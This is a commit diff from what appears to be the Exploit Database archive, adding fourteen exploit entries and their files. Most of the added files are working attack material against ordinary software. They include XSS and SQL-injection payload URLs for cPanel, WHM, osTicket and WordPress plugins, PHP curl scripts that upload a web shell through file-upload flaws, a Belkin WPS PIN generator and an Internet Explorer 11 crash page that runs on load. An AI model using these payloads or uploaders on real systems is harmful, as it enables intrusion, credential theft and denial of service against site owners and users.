DB: 2015-09-13

14 new exploits

files.csv

@@ -34448,6 +34448,20 @@ id,file,description,date,author,platform,type,port
 38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
 38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
 38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
+38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash PoC",2015-09-11,Mjx,windows,dos,0
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
 38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
+38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
+38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
+38154,platforms/php/webapps/38154.txt,"cPanel detailbw.html Multiple Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
+38155,platforms/php/webapps/38155.txt,"WHM 'filtername' Parameter Cross Site Scripting Vulnerability",2012-12-27,"Rafay Baloch",php,webapps,0
+38156,platforms/php/webapps/38156.txt,"cPanel 'dir' Parameter Cross Site Scripting Vulnerability",2012-12-26,"Rafay Baloch",php,webapps,0
+38157,platforms/php/webapps/38157.txt,"WordPress Xerte Online Plugin 'save.php' Arbitrary File Upload Vulnerability",2013-01-02,"Sammy FORGIT",php,webapps,0
+38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0
+38159,platforms/php/webapps/38159.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0
+38160,platforms/php/webapps/38160.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0
+38161,platforms/php/webapps/38161.txt,"osTicket l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0
+38162,platforms/php/webapps/38162.txt,"osTicket tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0
+38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload Vulnerability",2013-01-03,"Sammy FORGIT",php,webapps,0
+38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security Vulnerability",2013-01-03,ZhaoChunsheng,hardware,remote,0

platforms/hardware/remote/38164.py

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/57128/info
+
+Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.
+
+Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.
+
+Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.
+
+@author       : e.novellalorente@student.ru.nl
+Original work : ZhaoChunsheng 04/07/2012
+ 
+'''
+ 
+import sys
+ 
+VERSION    = 0
+SUBVERSION = 2
+ 
+def usage():
+    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
+    print "[*] Usage : python WPSpin.py 123456"
+    sys.exit(0)
+ 
+def wps_pin_checksum(pin):
+    accum = 0
+ 
+    while(pin):
+        accum += 3 * (pin % 10)
+        pin /= 10
+        accum += pin % 10
+        pin /= 10
+    return  (10 - accum % 10) % 10
+ 
+try:
+    if (len(sys.argv[1]) == 6):
+        p = int(sys.argv[1] , 16) % 10000000
+        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
+    else:
+        usage()
+except Exception:
+    usage()

platforms/php/webapps/38152.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57055/info
+
+MotoCMS is prone to a file-disclosure and an arbitrary file-upload vulnerability.
+
+An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks.
+
+MotoCMS 1.3.3 and prior versions are vulnerable. 
+
+http://www.example.com/admin/data/users.xml 

platforms/php/webapps/38153.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57060/info
+
+cPanel and WHM are prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/webmail/x3/mail/clientconf.html?domain=&redirectdomain=&acct=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&archiving=0 

platforms/php/webapps/38154.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57060/info
+ 
+cPanel and WHM are prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/frontend/x3/stats/detailbw.html?mon=Dec&year=2006&domain=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&target=x3demob 

platforms/php/webapps/38155.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57061/info
+
+WHM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E
+
+http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E 

platforms/php/webapps/38156.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57064/info
+
+cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E 

platforms/php/webapps/38157.txt

@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/57098/info
+
+The Xerte Online plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Xerte Online 0.32 is vulnerable; other versions may also be affected.
+
+##################################################
+# Description : Wordpress Plugins - Xerte Online Arbitrary File Upload Vulnerability
+# Version : 0.32
+# Link : http://wordpress.org/extend/plugins/xerte-online/
+# Plugins : http://downloads.wordpress.org/plugin/xerte-online.0.32.zip
+# Date : 30-12-2012
+# Google Dork : inurl:/wp-content/plugins/xerte-online/
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+Exploit :
+
+PostShell.php
+<?php
+
+$code = "[CODE PHP]";
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
+                'filedata'=>"$code"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+
+Shell Access :
+http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php 

platforms/php/webapps/38158.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57101/info
+
+The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1 

platforms/php/webapps/38159.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57101/info
+ 
+The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1 

platforms/php/webapps/38160.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57101/info
+  
+The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
+  
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1 

platforms/php/webapps/38161.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/57111/info
+
+osTicket is prone to multiple input-validation vulnerabilities including:
+
+1. Multiple cross-site scripting vulnerabilities
+2. An open-redirection vulnerability
+3. Multiple SQL-injection vulnerabilities
+
+An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+
+osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/learn/ostickRC/scp/l.php?url=http://www.example2.com 

platforms/php/webapps/38162.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/57111/info
+ 
+osTicket is prone to multiple input-validation vulnerabilities including:
+ 
+1. Multiple cross-site scripting vulnerabilities
+2. An open-redirection vulnerability
+3. Multiple SQL-injection vulnerabilities
+ 
+An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+ 
+osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22 

platforms/php/webapps/38163.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/57112/info
+
+The Uploader plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+Uploader 1.0.4 is vulnerable; other versions may also be affected. 
+
+PostShell.php
+<?php
+
+$uploadfile="lo.php";
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('Filedata'=>"@$uploadfile",
+'folder'=>"/wordpress/wp-content/uploads",
+'fileext'=>'php'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access :
+http://www.example.com/wordpress/wp-content/uploads/lo.php
+
+lo.php
+<?php
+phpinfo();
+?>

platforms/windows/dos/38146.html

@@ -0,0 +1,92 @@
+<!--
+# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
+# Date: 09.11.2015
+# Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431)
+# Tested on: Windows 7 64bit  and Windows 10(10240) 64bit
+# Author: Mjx
+# http://http://jinxin.pen.io/ 
+-->
+<!doctype html>
+<html>
+	<head>
+		<meta http-equiv='Cache-Control' content='no-cache'/>
+	
+		<title>crash IE 11</title>
+		<style></style>
+		<script type='text/javascript' ></script>
+		<script>
+			
+			function crash()
+			{
+				 var id_0 = null;
+				 id_0 = document.createElement( 'THEAD' ); 
+				 document.body.appendChild( id_0 ); 
+				 elemTree = []; 
+				 elemTree[0]= document.createElement('SELECT'); 
+				 document.all[7].appendChild(elemTree[0]); 
+				 elemTree[1]= document.createElement('B'); 
+				 document.all[8].appendChild(elemTree[1]); 
+				 elemTree[2]= document.createElement('SOURCE'); 
+				 document.all[0].appendChild(elemTree[2]); 
+				 elemTree[3]= document.createElement('HR'); 
+				 document.all[8].appendChild(elemTree[3]); 
+              	 elemTree[3].setAttribute('hidden', -4400000000); 
+				 elemTree[4]= document.createElement('SELECT'); 
+				 document.all[9].appendChild(elemTree[4]); 		
+				 elemTree[5]= document.createElement('RUBY'); 
+				 document.all[2].appendChild(elemTree[5]); 		
+				 elemTree[6]= document.createElement('OL'); 
+				 document.all[4].appendChild(elemTree[6]); 		
+				 elemTree[7]= document.createElement('AREA'); 
+				 document.all[6].appendChild(elemTree[7]); 			    
+				 elemTree[8]= document.createElement('ARTICLE'); 
+				 document.all[3].appendChild(elemTree[8]); 
+				 elemTree[9]= document.createElement('TEXTAREA'); 
+				 document.all[1].appendChild(elemTree[9]); 
+			     txtRange = document.body.createTextRange(); 
+				 txtRange.moveEnd('character', 14); 
+				 txtRange.select(); 
+				 txtRange.execCommand('insertUnorderedList',true,null); 			
+				 txtRange = document.body.createTextRange(); 
+				 txtRange.moveEnd('sentence', 4); 
+				 txtRange.select(); 
+				 txtRange.execCommand('insertOrderedList',true,null); 
+			
+			}
+		</script>
+	</head>
+	<body onload='crash();'>
+		
+	</body>
+</html>
+
+<!--
+(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
+eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
+eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+verifier!AVrfpDphAllocateVm+0x9:
+5fd166d9 50              push    eax
+0:008> kb
+ChildEBP RetAddr  Args to Child              
+09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9
+09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0
+09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d
+09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd
+0:008> r
+eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
+eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+verifier!AVrfpDphAllocateVm+0x9:
+5fd166d9 50              push    eax
+0:008> !vprot esp-4
+BaseAddress:       09ab2000
+AllocationBase:    09ab0000
+AllocationProtect: 00000004  PAGE_READWRITE
+RegionSize:        001fe000
+State:             00001000  MEM_COMMIT
+Protect:           00000004  PAGE_READWRITE
+Type:              00020000  MEM_PRIVATE
+
+
+-->